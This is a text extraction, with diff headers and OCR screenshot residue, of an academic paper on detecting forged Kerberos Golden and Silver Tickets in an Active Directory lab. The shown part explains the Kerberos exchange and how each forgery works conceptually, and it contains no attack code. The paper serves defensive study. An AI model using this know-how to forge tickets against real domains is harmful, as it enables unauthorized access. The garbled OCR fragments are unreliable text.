1dFPT4oBgHgl3EQfUjQc/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
39E4T4oBgHgl3EQfAwsS/content/tmp_files/2301.04845v1.pdf.txt ADDED
The diff for this file is too large to render. See raw diff
 
39E4T4oBgHgl3EQfAwsS/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
59AyT4oBgHgl3EQfQfYL/content/tmp_files/2301.00044v1.pdf.txt ADDED
@@ -0,0 +1,2257 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+
2
+ Detecting Forged Kerberos Tickets in an Active
3
+ Directory Environment
4
+ Thomas Grippo, Hisham A. Kholidy
5
+ State University of New York (SUNY) Polytechnic Institute, Network and Computer Security
6
+ Department, Utica, NY USA
7
+ grippot@sunypoly.edu, hisham.kholidy@sunypoly.edu
8
+
9
+ Abstract- Active Directory is the most popular service to manage users and devices on the network. Its widespread
10
+ deployment in the corporate world has made it a popular target for threat actors. While there are many attacks that
11
+ target Active Directory and its authentication protocol Kerberos, ticket forgery attacks are among the most
12
+ dangerous. By exploiting weaknesses in Kerberos, attackers can craft their own tickets that allow them to gain
13
+ unauthorized access to services on the network. These types of attacks are both dangerous and hard to detect. They
14
+ may require a powerful centralized log collecting system to analyze Windows security logs across multiple services.
15
+ This would give additional visibility to be able to find these forged tickets in the network.
16
+
17
+ Index Terms: Kerberos, Microsoft Active Directory, Kerberos attacks, detecting Kerberos attacks
18
+
19
+
20
+ I. INTRODUCTION
21
+ As the world becomes more reliant on
22
+ technology, the impact of cyberattacks will continue
23
+ to grow. Many people began to realize this in March
24
+ of 2020 when the COVID-19 pandemic began. This
25
+ was an unprecedented time as the world faced
26
+ widespread closures and whole economies came to a
27
+ grinding
28
+ halt.
29
+ The
30
+ dangers
31
+ of
32
+ this
33
+ highly
34
+ transmissible disease forced employers to send
35
+ everyone home, and thus the work from home culture
36
+ began to take off. This shift made people very
37
+ dependent on their computers and a reliable Internet
38
+ connection as they had to constantly attend meetings
39
+ and Zoom calls from their couch. Relying on
40
+ technology more than ever, companies and their
41
+ employees could not afford to face the ramifications
42
+ of a widespread cyber-breach and thus had to invest a
43
+ lot of time and money into protecting the
44
+ infrastructure that made these new workflows
45
+ possible.
46
+ Two years later, another unprecedented event
47
+ caused a greater focus on cybersecurity. In February
48
+ of 2022, Russia began its invasion of Ukraine. Being
49
+ how interconnected the major countries were in the
50
+ world economy, nobody expected there to be another
51
+ large-scale invasion such as this, and its effects were
52
+ felt around the world. More interestingly, it was the
53
+ first major conflict where cyberwarfare became a
54
+ prominent factor. One DNS platform claimed that
55
+ they blocked 10 times the normal number of malware
56
+ attacks targeting people in Ukraine [1]. There were
57
+ also major disruptions in Internet traffic as Russia cut
58
+ power in many Ukrainian cities. Due to the nature of
59
+ cyberwarfare, individuals around the world also were
60
+ able to play a part in the conflict, going after Russian
61
+ infrastructure in support of Ukraine.
62
+ Looking at the current state of the world, the
63
+ importance of defending cyberspace is becoming
64
+ clearer to everyone. Modern assets will continue to
65
+ thrive on the Internet, and for them to function
66
+ properly they must be defended. This is true for any
67
+ asset whether it be government or corporate-owned.
68
+ One of the biggest issues many organizations
69
+ face is managing all the assets they have on the
70
+ network. To help solve this, Windows Active
71
+ Directory is employed. Windows Active Directory,
72
+ or AD for short, is a directory service that provides
73
+ methods to store directory data and make it available
74
+ to network users and administrators. This directory
75
+ data can be any information about a certain object
76
+ such as a user or service [2]. In essence, Active
77
+ Directory acts as a centralized database for all the
78
+ users and services that exist within a network, and it
79
+ is invaluable for administrators managing this
80
+ environment. In fact, it is stated that over 90% of the
81
+ Global Fortune 1000 companies, that is the top 1000
82
+ companies, use AD domain services [3].
83
+ With such widespread dominance in the
84
+ corporate world, Active Directory has become a
85
+ target for many threat actors. Specifically, they have
86
+ targeted
87
+ AD’s
88
+ default
89
+ authentication
90
+ service
91
+ Kerberos. Kerberos is what allows users within an
92
+ AD environment to access resources, and thus if it
93
+ can be exploited by an attacker, that attacker would
94
+ also be able to access such resources. This can be
95
+ very troubling because if an attacker can exploit the
96
+ Kerberos protocol, they can easily pivot to any part
97
+ of the network and maintain persistence. That is why
98
+ securing Active Directory, and detecting attacks
99
+ within the environment should be a priority for IT.
100
+
101
+
102
+ In this paper, we will be focusing on two
103
+ different attacks on Kerberos, the Golden Ticket
104
+ attack, and the Silver Ticket attack, which can be
105
+ collectively referred to as forged Kerberos ticket
106
+ attacks. We will explore how these attacks function
107
+ within a virtualized Active Directory environment,
108
+ and more importantly how to detect them. The rest of
109
+ this paper will be structured as follows: Section II
110
+ will provide the necessary background information to
111
+ understand this experiment. This will include an in-
112
+ depth look at Windows Active Directory, Kerberos
113
+ Authentication Services, and the Golden Ticket and
114
+ Silver Ticket attacks. Section III will give an
115
+ overview of the virtual environment that will be set
116
+ up to carry out these experimental tests. Then,
117
+ Section IV will walk through the operation of the
118
+ Kerberos attacks within the virtual environment and
119
+ how they can be detected. Section V will go over the
120
+ results of this experiment and discuss the potential
121
+ impacts in the real world. Finally, Section VI will
122
+ provide a conclusion to everything discussed in this
123
+ paper.
124
+
125
+ II. BACKGROUND
126
+ This section will provide an overview of the
127
+ background knowledge needed to understand the
128
+ components of this experiment. Topics such as
129
+ Windows Active Directory and the Kerberos
130
+ Authentication Protocol will be explained in detail.
131
+
132
+ A. Active Directory Domain Services
133
+ As
134
+ stated
135
+ previously,
136
+ almost
137
+ all
138
+ modern
139
+ organizations are using Windows Active Directory to
140
+ manage the users in their network, so it is important
141
+ to understand this Microsoft product in depth.
142
+ At the very core of Active Directory lies the users
143
+ and the computers. People and their computers are
144
+ what fundamentally make up a network, and in AD
145
+ they will each have their own account. Shown below
146
+ in Figure 1 is an example user account in AD.
147
+
148
+ Figure 1: User Account in Active Directory
149
+ The user login name is shown, as well as the domain
150
+ that it belongs to which is grippot.com. Instead of
151
+ individually assigning permissions to each user
152
+ account, they can instead be added to security groups
153
+ within AD. These security groups can then be
154
+ assigned specific permissions. For every user
155
+ account, we can see what security groups they are a
156
+ part of under the Member Of tab shown in Figure 2.
157
+ As shown, this user is part of the Domain Admins and
158
+ Domain Users security groups, which are default
159
+ groups created when Active Directory is configured.
160
+ Each of these groups has a set of permissions defined
161
+ that will apply to any users that are a part of the
162
+ group. So for instance, this user will have all of the
163
+ permissions of a Domain Admin.
164
+ Figure 2: Security Groups in Active Directory
165
+
166
+ This streamlines the process of access control. For
167
+ example, if a new employee gets hired within the
168
+ accounting department, instead of manually assigning
169
+ them all the permissions they need, you can simply
170
+ add them to a custom accounting security group and
171
+ they will inherit all of their permissions.
172
+ So far we have user and computer accounts, as
173
+ well as security groups to manage permissions. If you
174
+ want to organize all of these accounts within Active
175
+ Directory, you can create organizational units (OUs)
176
+ or containers as shown in Figure 3.
177
+
178
+ Figure 3: OUs and Containers
179
+
180
+ ActiveDirectory Users and Computers
181
+ File
182
+ Action
183
+ View
184
+ Help
185
+ 7
186
+
187
+ Active Directory Users and Computers [Win!
188
+ Name
189
+ Type
190
+ Description
191
+ SavedQueries
192
+ _ADMINS
193
+ Organizational...
194
+ V
195
+ grippot.com
196
+ _USERS
197
+ Organizational...
198
+ _ADMINS
199
+ Builtin
200
+ USERS
201
+ builtinDomain
202
+ Computers
203
+ Builtin
204
+ Container
205
+ Default container for up...
206
+ Domain Con...
207
+ Computers
208
+ Organizational...
209
+ Default container for do...
210
+ Domain Controllers
211
+ ForeignSecu...
212
+ Container
213
+ Default container for sec...
214
+ ForeignSecurityPrincipals
215
+ Managed Se...
216
+ Container
217
+ Default container for ma...
218
+ Managed Service Accounts
219
+ Users
220
+ Container
221
+ Default container for up...
222
+ UsersTomGrippoProperties
223
+ ?
224
+ Member Of
225
+ Dialin
226
+ Environment
227
+ Sessions
228
+ Remote control
229
+ Remote Desktop Services Profile
230
+ COM+
231
+ General
232
+ Address
233
+ Account
234
+ Profile
235
+ Telephones
236
+ Organization
237
+ User logon name:
238
+ atgrippol
239
+ @grippot.com
240
+ V
241
+ User logon name (pre-Windows 2000)
242
+ GRIPPOT
243
+ atgrippo
244
+ Logon Hours...
245
+ Log On To...
246
+ Unlockaccount
247
+ Account options:
248
+ User must change password at next logon
249
+ Usercannotchangepassword
250
+ Passwordneverexpires
251
+ Store password using reversibleencryption
252
+ Account expires
253
+ Never
254
+ O End of:
255
+ Saturday.
256
+ April
257
+ 30,2022
258
+ 画Tom Grippo Properties
259
+ ?
260
+ Remote control
261
+ Remote Desktop Services Prfle
262
+ COM+
263
+ GeneralAddress
264
+ Account
265
+ Organization
266
+ Member Of
267
+ Didlin
268
+ Environment
269
+ Sessions
270
+ Member of:
271
+ Name
272
+ Active Directory Domain Services Folder
273
+ Domain Admins
274
+ gropot.com/Users
275
+ Domain Users
276
+ grippot.com/Users
277
+ Add..
278
+ Remove
279
+ Pimary group:
280
+ Domain Users
281
+ Se Pimay Group
282
+ you have Macintosh clents or POSIXcompliant
283
+ There is no need to change Primary group unless
284
+ applications.
285
+ OK
286
+ Cancel
287
+ Apply
288
+ Help
289
+
290
+ In this screenshot, the containers are plain folders and
291
+ the OUs are marked. The main difference being that
292
+ you can apply group policy to OUs but not to
293
+ containers [2]. So if you want to organize all of the
294
+ users, you can create OUs based on the different
295
+ departments within the company.
296
+ Taking a step back, all these objects discussed exist
297
+ within a domain. This can be seen in Figure 3, where
298
+ all the OUs and containers, as well as the user and
299
+ computer accounts that exist within them, belong to the
300
+ grippot.com domain. The domain is controlled by the
301
+ domain controller which is typically a Windows
302
+ server. The domain controller is where all the objects
303
+ are stored and can be managed.
304
+ For the purposes of this paper, this is all the
305
+ information that is needed. It should be noted though,
306
+ that Active Directory does not stop with domains.
307
+ There are also trees (a domain and its subdomains) as
308
+ well as forests. However, this will not be relevant to
309
+ the experiments in this paper.
310
+
311
+ B. Kerberos
312
+ Another component of Active Directory is the
313
+ Kerberos Authentication Protocol [4]. This is what
314
+ allows a user account to access a computer or
315
+ resource within a domain. It performs both
316
+ authentication and authorization based on the
317
+ permissions of the user account. In an AD
318
+ environment, the domain controller will act as the
319
+ Key Distribution Center or KDC. The KDC is made
320
+ up of the Authentication Service (AS), and the Ticket
321
+ Granting Service (TGS).
322
+ Shown below in Figure 4 is an overview of the
323
+ message exchange within Kerberos, we will use this
324
+ diagram to analyze each step in the Kerberos
325
+ protocol. In this example, we will say that a user is
326
+ logging on to a desktop instead of accessing a server
327
+ as shown in Figure 4.
328
+
329
+ Figure 4: Kerberos Message Exchanges [5]
330
+
331
+ For a user to log on to a computer, they must enter
332
+ their username and password. Once they hit enter, the
333
+ Kerberos message exchange will begin. First, the
334
+ client will send a KRB_AS_REQ to the AS on the
335
+ KDC. This stands for Kerberos Authentication
336
+ Service Request and is shown below in Figure 5.
337
+
338
+
339
+ Figure 5: KRB_AS_REQ [6]
340
+
341
+ This message will include the username, a timestamp
342
+ encrypted with the user’s password, and the service
343
+ principal name of the requested service. Since the
344
+ user is requesting authentication, this will be the SPN
345
+ of the krbtgt account, a default account within AD
346
+ [5]. Once this message is sent to the KDC, it will
347
+ look at the username inside the message. It will then
348
+ retrieve the associated password key with that
349
+ account and attempt to decrypt the timestamp. If it
350
+ can decrypt the timestamp, then the user’s identity
351
+ has been proven and authenticated. It will also verify
352
+ that the timestamp is not too old.
353
+
354
+ Figure 6: KRB_AS_REP [6]
355
+
356
+ The next message shown above in Figure 6 is the
357
+ response of the KDC. Since the user sent the SPN of
358
+ the krbtgt account in the prior message, it knows that
359
+ the user wants a ticket-granting ticket (TGT). This
360
+ TGT acts as proof of authentication, and will be used
361
+ to request tickets for specific services within AD. As
362
+ shown above, the TGT is encrypted with the hash of
363
+ the krbtgt account, and it includes the username of
364
+ the user, a session key that will be used for future
365
+ message exchanges, the TGT expiration time, and the
366
+ PAC which includes all the user’s permissions. The
367
+ KRB_AS_REP message also includes the username
368
+ and the same session key which is encrypted with the
369
+ user’s password key. When this message is received
370
+ by the user, they will not be able to decrypt the TGT,
371
+ but instead will make a copy and store it in memory
372
+ for future use. They will be able to decrypt the rest of
373
+ the message which includes a session key. This is a
374
+ symmetric key that will be used to encrypt future
375
+ messages to the KDC.
376
+ At this point, the user has successfully
377
+ authenticated and has a TGT. Now they will use this
378
+ TGT to get a service ticket for the computer they are
379
+ trying
380
+ to
381
+ log
382
+ in
383
+ to.
384
+
385
+ Timestamp
386
+ User hash
387
+ Username
388
+ SPN krbtgt
389
+ Usernonce(1)KRB_AS_REQ
390
+ -(2)KRB_AS_REP
391
+ (3) KRB_TGS_REQ
392
+ (4) KRB_TGS_REP
393
+ Client
394
+ KDC
395
+ (6)KRB_AP_REP
396
+ (5) KRB_AP_REQUsername
397
+ TG
398
+ Username
399
+ Session key
400
+ Session key
401
+ TGTexpirationtime
402
+ TGT expiration time
403
+ Usernonce
404
+ PAC
405
+ krbtgt
406
+ nash
407
+ Userhash
408
+ krbtgt hash
409
+
410
+ Figure 7: KRB_TGS_REQ [6]
411
+
412
+
413
+
414
+
415
+
416
+
417
+
418
+
419
+
420
+
421
+ Figure 7: KRB_TGS_REQ [6]
422
+
423
+ First, they will send a ticket-granting service
424
+ request or KRB_TGS_REQ to the KDC. Take note
425
+ that the KDC is now acting as the TGS instead of the
426
+ AS. The user will copy the TGT from RAM into the
427
+ message as proof of their authentication. They will
428
+ also place their username and timestamp, which will
429
+ be encrypted with the session key that they received
430
+ in the prior message. Also, the SPN of the computer
431
+ they are attempting to log into will be placed inside
432
+ the message unencrypted. When the KDC receives
433
+ this message, it will be able to decrypt the TGT with
434
+ the krbtgt hash. Inside the TGT, it will retrieve the
435
+ session key to decrypt the rest of the message. It will
436
+ verify the timestamp and expiration time of the TGT.
437
+ Then, it will begin to craft the KRB_TGS_REP
438
+ message.
439
+
440
+
441
+ Figure 8: KRB_TGS_REP [6]
442
+
443
+ The KDC will find the hash of the requested
444
+ service based on the SPN in the prior message. It will
445
+ then generate another session key that will be used in
446
+ future communications between the client and the
447
+ service. It will take the key, and the username with its
448
+ associated permissions, and will encrypt it with the
449
+ hash of the service account. This will be the TGS
450
+ ticket that the user uses to access the service. The
451
+ KDC will also make another copy of the service
452
+ session key for the user, which will be encrypted with
453
+ the user’s hash. When the user receives this message,
454
+ they will copy the TGS ticket into RAM. They will
455
+ also decrypt the rest of the message so that they can
456
+ access the service session key.
457
+
458
+ So far the user has authenticated with the KDC in
459
+ order to get a TGT, and they used their TGT to get a
460
+ TGS for the computer they are trying to access. Now
461
+ they can begin to communicate with the computer.
462
+ First, they will send a KRB_AP_REQ message to
463
+ the service, as shown below in Figure 9.
464
+
465
+ Figure 9: KRB_AP_REQ [6]
466
+
467
+ The TGS will be copied from RAM and placed inside
468
+ the message along with the username and a
469
+ timestamp which is encrypted with the service
470
+ session key. This message will then be sent to the
471
+ service which in this case is the same computer the
472
+ user is trying to log in to. When the service receives
473
+ this message, it will attempt to decrypt the TGS with
474
+ its hash. If it is successful, it knows that this ticket
475
+ came from the KDC since the KDC, or domain
476
+ controller is the only other server that has its hash.
477
+ Inside the TGS, the service will retrieve the service
478
+ session key to decrypt the rest of the message. It will
479
+ then check the username of the user and verify that
480
+ they have valid permissions. Recall that in the
481
+ KRB_TGS_REP message, the KDC included the
482
+ user’s permissions within the TGS. After this
483
+ verification step, the service will decide whether to
484
+ grant the user access. Assuming it will, the service
485
+ will send a KRB_AP_REP back to the user and they
486
+ will be able to login to the computer.
487
+ After the user is logged into the computer, they
488
+ can then access other resources within the Active
489
+ Directory Domain. Each time they want to access a
490
+ different service, they will need to retrieve a TGS
491
+ from the KDC and repeat the same process.
492
+
493
+ C. Attacks on Kerberos
494
+ Now that Active Directory and Kerberos have
495
+ been explained, it will be easier to understand the
496
+ various attacks against the Kerberos protocol. Since
497
+ Kerberos is a secure protocol, many of these attacks
498
+ are advanced. For the purposes of this paper, we will
499
+ only be looking at two types of attacks, Golden
500
+ Ticket, and Silver Ticket attacks.
501
+
502
+ 1) Silver Ticket Attack: The Silver Ticket attack is
503
+ when an attacker forges a TGS ticket. For this to be
504
+ successful, the attacker would need the password or
505
+ NTLM service hash of the service account to be able
506
+ to properly encrypt the TGS ticket [7]. They could
507
+ then make up any session key they want to use, and
508
+
509
+ Username
510
+ TGS
511
+ Service session key
512
+ Service session key
513
+ Username
514
+ TGS expiration time
515
+ TGS expiration time
516
+ Usernonce
517
+ PAC
518
+ krbtgt
519
+ nash
520
+ Sessionkey
521
+ service ownerhashTGS
522
+ Serviceownerhash
523
+ Username
524
+ Timestamp
525
+ ServicesessionkeyUsername
526
+ Timestamp
527
+ Sessionkey
528
+ TGT
529
+ krbtgt hash
530
+ SPN
531
+ User nonce
532
+ add in the rest of the information inside the TGS
533
+ ticket such as the expiration time and the PAC. For
534
+ the PAC, ideally, the attacker would give
535
+ themselves admin privileges so they can have full
536
+ access to the service.
537
+ 2) Golden Ticket Attack: The Golden Ticket
538
+ attack is when an attacker forges the TGT. For this
539
+ to be successful, the attacker would need the hash
540
+ of the krbtgt account, which is much harder to
541
+ acquire than any service account hash [7].
542
+ However, if an attacker is successful, they can
543
+ essentially impersonate the KDC and give
544
+ themselves administrator rights to any service in the
545
+ domain. This attack is extremely dangerous if
546
+ successful, but it is harder to perform and noisier
547
+ than the silver ticket attack.
548
+
549
+ III. THE VIRTUAL ENVIRONMENT
550
+ To see these Kerberos attacks in real-time and
551
+ attempt to detect them, we will need to set up a
552
+ virtual environment. Shown in Figure 10 is a diagram
553
+ of the environment that has been set up for this
554
+ experiment. To keep things simple, there are only
555
+ three systems in the grippot.com domain, the domain
556
+ controller, a Windows 10 client, and a SQL server.
557
+ Then, there is the attacker machine which resides
558
+ outside of the domain. Each of these systems will be
559
+ explained in detail, as well as the role that they play
560
+ within the Kerberos Authentication protocol and
561
+ ticket forgery attacks.
562
+
563
+ Figure 10: The Virtual Environment
564
+
565
+ This virtual environment was created using
566
+ VirtualBox [8] as the hypervisor. VirtualBox is a
567
+ type-2 hypervisor, meaning that it runs as software on
568
+ the host OS. It can be downloaded from the website
569
+ at https://www.virtualbox.org/. Each of the systems
570
+ in this environment are running on separate
571
+ VirtualBox VMs.
572
+ The domain controller (DC) is the most important
573
+ system in the environment and serves many purposes.
574
+ It is a Windows Server 2019 machine with two
575
+ network interface cards (NIC), critical for the
576
+ functioning of this environment. These can be seen in
577
+ Figure 11 below.
578
+
579
+ Figure 11: Network Interfaces for DC
580
+
581
+ One of the NICs is connected to the Internet from the
582
+ host machine running VirtualBox. The other NIC is
583
+ internal and has a static IP address of 172.16.0.1 as
584
+ shown above. The reason for the domain controller to
585
+ have two NICs is because in this environment it is
586
+ also acting as a router. This means that not only is the
587
+ domain
588
+ controller
589
+ running
590
+ Windows
591
+ Active
592
+ Directory, but it is also routing traffic for all the other
593
+ VMs. In order for this to be possible, the domain
594
+ controller also must be running DNS and DHCP as
595
+ shown in Figure 12, the Windows Server Manager.
596
+
597
+ Figure 12: Windows Server Manager for DC
598
+
599
+ Having these services configured, the DC will be able
600
+ to dynamically assign IPv4 addresses within the
601
+ scope as shown in Figure 13.
602
+
603
+
604
+ Internet
605
+ grippot.com
606
+ Domain
607
+ Controller
608
+ Windows 10
609
+ SQL, Server
610
+ MSSQLSVC
611
+ Windows 10internal
612
+ INTERNET
613
+ grippot.com
614
+ grippot.com
615
+ Intel(R)PRO/1000MTDesktopAd..
616
+ Intel(R)PRO/1000MTDesktopAd...
617
+ internal Status
618
+ X
619
+ INTERNETStatus
620
+ X
621
+ Network Connection Details
622
+ X
623
+ Network ConnectionDetails
624
+ X
625
+ Network Connection Details
626
+ Network Connection Details:
627
+ Propety
628
+ Value
629
+ Property
630
+ Value
631
+ Connection-specific DN...
632
+ Connection-specific DN...
633
+ sunyit.edu
634
+ Description
635
+ Intel(R) PRO/1000 MT Desktop Adapter
636
+ Description
637
+ Intel(R) PRO/1000 MT Desktop Adapter
638
+ Physical Address
639
+ 08-00-27-8B-F4-6E
640
+ Physical Address
641
+ 08-00-27-F5-8A-56
642
+ DHCPEnabled
643
+ No
644
+ DHCP Enabled
645
+ Yes
646
+ IPv4 Address
647
+ 172.16.0.1
648
+ IPv4 Address
649
+ 10.0.2.15
650
+ IPv4 Subnet Mask
651
+ 255.255.255.0
652
+ IPv4 Subnet Mask
653
+ 255.255.255.0
654
+ IPv4 Default Gateway
655
+ Lease Obtained
656
+ Tuesday. March 22, 2022 7:44:03 AM
657
+ IPv4 DNS Server
658
+ Lease Expires
659
+ Monday. April 4, 2022 9:35:04 AM
660
+ IPv4 WINS Server
661
+ IPv4 Default Gateway
662
+ 10.0.2.2
663
+ NetBIOS over Tcpip En...
664
+ Yes
665
+ IPv4 DHCP Server
666
+ 10.0.2.2
667
+ Linklocal IPv6 Address
668
+ fe80:60eb:bb05:d0a6:263f%12
669
+ IPv4 DNS Server
670
+ IPv6 Default Gateway
671
+ IPv4 WINS Server
672
